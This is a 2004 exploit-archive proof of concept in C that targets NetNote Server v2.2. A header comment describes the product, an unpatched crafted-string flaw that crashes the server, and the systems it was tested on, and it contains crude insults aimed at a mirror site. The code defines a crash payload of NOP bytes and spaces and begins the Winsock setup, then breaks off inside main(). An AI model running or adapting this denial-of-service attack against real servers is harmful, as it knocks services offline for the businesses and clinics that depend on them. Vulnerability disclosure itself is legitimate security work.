/* NetNote Server v2.2 build 230, crafted string vulnerability. Poc included crash the server. Full disclosure and poc exploit by class101 [at] DFind.kd-team.com [&] #n3ws [at] EFnet 13 november 2004 ------------------ WHAT IS NETNOTE ------------------ Homepage - http://www.alshare.com/ NetNote is the most complete free electronic note software. NetNote has been created to improve your productivity by integrating several unique features with an easy-to-use and nice-looking interface. Also called sticky-note utility, this Windows freeware targets SOHO and medium size businesses as well as the Health community. It has network capabilities (send and receive notes, Instant Messaging), text notes, audio attachments, alarms and models (templates). It also supports the latest Windows XP features as transparency and XP themes. The 5.0 version contains several features asked by the Health community (veterinarians, physicians and dentists). For example, NetNote is now integrated with AVImark, the leading veterinarian software. -------------- VULNERABILITY -------------- A special string submitted to the server will cause an access violation... ---- FIX ---- Actually none, the vendor is contacted. ---- EXTRA ---- Tested on Win2k Server SP4 and WinXP Pro SP1. This shouldn't be more exploitable, else code something to show me that Im wrong :-> ---- BY ---- class101 [at] DFind.kd-team.com [&] #n3ws [at] EFnet who F.U.C.K K-OTik.com displaying the half part of codes they receive (also some other friends to me noticed it..., another ie: JPEG Exploits, 6 or 7 mirrors displayed, poor assh0les...) milw0rm.com rules! */ #include "winsock2.h" #include "fstream.h" #pragma comment(lib, "ws2_32") static char payload[100]; char crash[]="\x90\x90\x90\x90\x20\x20\x20\x20"; void usage(char* us); WSADATA wsadata; void ver(); int main(int argc,char *argv[]) { ver(); if ((argc<3)||(argc>4)||(atoi(argv[1])<1)||(atoi(argv[1])>1)){usage(argv[0]);return -1;} if (WSAStartup(MAKEWORD(2,0),&wsadata)!=0){cout<<"[+] wsastartup error: "<